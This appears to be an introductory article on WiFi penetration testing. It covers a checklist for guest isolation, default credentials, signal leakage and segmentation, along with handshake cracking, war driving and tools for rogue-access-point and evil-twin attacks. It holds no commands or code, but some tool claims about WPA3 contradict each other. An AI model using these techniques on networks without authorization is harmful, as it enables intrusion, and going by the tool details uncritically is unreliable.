Penetration testing for WiFi: What to look for

Here is what pentesters typically look for when pentesting WiFi networks. These are a list of questions they might ask themselves to begin their initial security assessment.

Isolating external and internal access

Have external users accessing WiFi (non-enterprise users such as visitors and guests) been appropriately limited access to parts of the internal network? This is to ensure that the visitors and guests accessing the network via WiFi cannot access any portion of the internal network to compromise other devices on the network

Device configurations

Default configurations and/or default authentication credentials are simple and guessable. Checks must ensure defaults are not in use on any wireless access points.

Leakage

Often, the WiFi signals can leak beyond the working enclosures of the enterprise. A typical example is being able to connect to the enterprise WiFi network from a nearby car park. Signal configurations on access points need to be checked so that they are not accessible from outside the physical office spaces unless otherwise intended. appropriate and implemented as intended.

Segmentation

The network should be appropriately segmented, typically with each segment localising the access of resources they require. For example, in an enterprise, the marketing and sales team could be a single network segment and users from this segment alone are provided access to the sales database.

Secure authentication

Ensuring that the wireless network uses an appropriate authentication model. This includes attempting to capture the handshake, cracking any captured handshake, and reviewing uncracked passphrases to assess their complexity.

Detect rogue access points

Identify rogue access points by scanning around the building and passively capture the SSID and signal strength.

The two attack surfaces used to exploit wireless networks are Client Devices and Access Points. Overall, the seven steps of traditional pentesting applies here too. It is quite common for a WiFi network to be a part of a larger network such as an enterprise network. So, the pentesting of the wireless segment will be a part of pentesting the enterprise network.

War driving and heat mapping

During pentests war driving and heat mapping are the tasks that are unique to WiFi. War driving involves physically scanning around the WiFi zones in an enterprise. War driving tests the signal strength of wireless networks and the distance the signal extends beyond the facility. Areas/zones where the signal extends beyond the facility require to be limited so there is no external access.

_{(Click to expand)}

Other typical vulnerabilities are from the configurable parts of the encryption mechanisms built-in. WEP Encryption Attacks exploit the Wired Equivalent Privacy (WEP) encryption protocol, where the attacker captures initialization vectors (IVs) from wireless network traffic and cracks the password. WPA/WPA2 Encryption Attacks are exploited by capturing pre-shared keys (PSKs) and cracking them.

WiFi pentesting tools

Here are a few tools that can be used for pentesting WiFi. These utilities can monitor packets, play rogue access points, launch MiTM attacks such as replay, in addition to others.

• Aircrack-ng can monitor traffic and launch attacks requiring packet injection such as replay attacks, deauthentication, and fake (rogue) access points. Starting from version 1.6, Airodump-ng, can detect WPA3 networks.
• Airodump-ng is used to capture packets, for capturing an WPA2/WPA3 handshake. However, since SAE is resistant to offline brute-force attacks, capturing the handshake is not useful. Other tools in the suite do not have support for WPA3 at present.
• Airgeddon can detect WPA3 networks and capture packets, as it is using Aircrack-ng under the hood. Airgeddon is currently not supporting WPA3, due to the lack of hardware support for testing purposes.
• Hostapd enables a network interface card to act as an access point and authentication server. Hostapd ver 2.7 has added support for the new SAE handshake. It is possible to set up a malicious WPA3 network manually.
• Eaphammer is a toolkit for performing targeted evil twin attacks. It uses Hostapd with support for WPA3.
• Wifiphisher is a rogue Access Point framework for conducting Wi-Fi security testing. Wifiphisher can run on a Raspberry Pi device.